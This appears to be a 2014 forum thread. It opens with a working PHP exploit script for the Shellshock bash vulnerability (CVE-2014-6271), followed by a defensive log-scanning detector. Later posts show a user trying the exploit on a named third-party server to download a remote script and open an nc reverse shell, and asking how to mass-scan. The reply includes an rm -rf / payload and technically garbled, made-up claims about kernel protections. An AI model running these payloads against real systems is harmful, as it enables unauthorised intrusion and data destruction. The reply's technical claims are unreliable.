Aerosol Posted September 25, 2014

```php
<?php
/*
Title: Bash Specially-crafted Environment Variables Code Injection Vulnerability
CVE: 2014-6271
Vendor Homepage: https://www.gnu.org/software/bash/
Author: Prakhar Prasad && Subho Halder
Author Homepage: https://prakharprasad.com && https://appknox.com
Date: September 25th 2014
Tested on: Mac OS X 10.9.4/10.9.5 with Apache/2.2.26
           GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13)
Usage: php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd
Eg.    php bash.php -u http://localhost/cgi-bin/hello -c "wget http://appknox.com -O /tmp/shit"
Reference: https://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/

Test CGI Code :
#!/bin/bash
echo "Content-type: text/html"
echo ""
echo "Bash-is-Vulnerable"
*/

error_reporting(0);

// The script is meant to be run from the command line only.
if(!defined('STDIN')) die("Please run it through command-line!\n");

// -u: URL of the CGI script, -c: command to send.
$x = getopt("u:c:");
if(!isset($x['u']) || !isset($x['c'])){
    die("Usage: ".$_SERVER['PHP_SELF']." -u URL -c cmd\n");
}

$url = $x['u'];
$cmd = $x['c'];

// The User-Agent header is copied by the web server into the CGI environment
// (HTTP_USER_AGENT); a vulnerable bash treats a value starting with "() {"
// as a function definition and keeps executing what follows it.
$context = stream_context_create(
    array(
        'http' => array(
            'method' => 'GET',
            'header' => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"'
        )
    )
);

$req = file_get_contents($url, false, $context);

// $http_response_header is populated by file_get_contents() for HTTP URLs;
// a 500 status is taken as the sign that the CGI's output was disturbed.
if(!$req && strpos($http_response_header[0],"500") > 0 )
    die("Command sent to the server!\n");
else if($req && !strpos($http_response_header[0],"500") > 0)
    die("Server didn't respond as it should!\n");
else if(!$req && $http_response_header == NULL)
    die("A connection error occurred!\n");
?>
```
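From the defender's side, the request shape used by the script above (a header value beginning with the bash function-definition prefix "() {") is easy to spot in web server logs once the User-Agent and Referer fields are being logged. The following is an added example, not part of the original post or of the exploit's authors' code: it parses Apache "combined" format lines and flags any Referer or User-Agent carrying that prefix. The log lines are constructed for this example (documentation IP ranges, no real hosts), and the matching regex is deliberately a little more tolerant than bash's own exact "() {" check, which is a design choice of this example rather than a statement about what bash accepts.

```python
import re

# Before the CVE-2014-6271 fix, bash imported any environment variable whose
# value began with "() {" as a function definition and then kept executing
# whatever followed the closing "};".  CGI web servers copy request headers
# into the environment (User-Agent -> HTTP_USER_AGENT, Referer -> HTTP_REFERER),
# which is the path the PHP script in the post uses.
#
# Tolerant variant of the prefix: optional whitespace inside the parentheses
# and before the brace, matched anywhere in the header value (assumption of
# this example; bash itself only looks for the exact four characters "() {"
# at the very start of the value).
SHELLSHOCK_PREFIX = re.compile(r"\(\s*\)\s*\{")

# Apache "combined" log format.  Quoted fields may contain escaped quotes
# (\"), so each one is matched with an escape-aware pattern.
COMBINED_LOG = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# Constructed sample log: one request shaped like the PHP script's, one
# ordinary browser request, and one probe carried in the Referer header.
SAMPLE_LOG = r'''203.0.113.5 - - [25/Sep/2014:10:14:02 +0000] "GET /cgi-bin/hello HTTP/1.1" 500 340 "-" "() { :;}; /bin/bash -c \"id\""
198.51.100.7 - - [25/Sep/2014:10:14:09 +0000] "GET /index.html HTTP/1.1" 200 2326 "http://example.com/" "Mozilla/5.0 (X11; Linux x86_64)"
192.0.2.9 - - [25/Sep/2014:10:15:31 +0000] "GET /cgi-bin/status HTTP/1.1" 200 17 "() {:;}; echo probe" "curl/7.30.0"
'''


def parse_combined(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = COMBINED_LOG.match(line)
    return m.groupdict() if m else None


def find_shellshock_attempts(lines):
    """Return (client_ip, request_line, header_value) for every line whose
    Referer or User-Agent contains the function-definition prefix."""
    hits = []
    for line in lines:
        fields = parse_combined(line)
        if fields is None:
            continue  # unparseable line: skip rather than crash the scan
        for name in ("referer", "ua"):
            value = fields[name]
            if SHELLSHOCK_PREFIX.search(value):
                hits.append((fields["ip"], fields["request"], value))
    return hits


def scan_sample():
    """Run the detector over the constructed sample log."""
    return find_shellshock_attempts(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for ip, request, value in scan_sample():
        print(f"{ip}  {request!r}  header={value!r}")
```

The `500` status on the first sample line matches what the PHP script treats as success: the injected command's output is not a valid CGI response, so the server fails the request. A hit on a `200` line (the Referer probe) is still worth alerting on, since it shows the prefix being tried against a CGI path regardless of whether it worked.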
florinul Posted September 26, 2014

Can someone give me some guidance? I tried on several servers like this:

php php -u http://www.gallery.cz/cgi-bin/gallery/hynekol/aps.sh -c" wget http://suse.altervista.org/s/dc.txt -O /tmp/dc.txt"
php php -u http://www.gallery.cz/cgi-bin/gallery/hynekol/aps.sh -c " perl dc.txt ip.ip.ip.ip 2121"

or

php -u http://www.gallery.cz/cgi-bin/gallery/hynekol/aps.sh -c"/ bin/nc -e /bin/sh ip.ip.ip.ip 2121"

and it didn't work on any of them. Can someone explain to me how to get nc on the bash-vulnerable servers?
Nytro Posted September 26, 2014

It's never going to work, either. Have you even read a single article about the problem? You know, that "() {" ?
florinul Posted September 26, 2014

Nytro, I admit I'm not good at this anymore, because I haven't dealt with it for years. Rather, explain to me how to mass scan with it, for example with that pnscan, isn't that possible?
Nytro Posted September 26, 2014

It's easy to exploit for a single server, but things get complicated for multiple servers. For example, a classic (){:;}; rm -rf / won't work on every server, because many servers have SELinux on top of the kernel, and grsecurity stops the exploitation already at network layer 2! The only thing that can be tried is a privilege escalation exploit, through which, by controlling the ESP, you modify the page memory that contains that script and thus bypass it by switching the protocol from TCP to ICMP. But you realise that it is difficult to do something like that, especially since there are very many kernel versions, and to make it compatible you will have to find signatures for the functions and IOCTLs that control the SSDT and validate code integrity... So it's best to read the articles and try to understand them, it's not that difficult.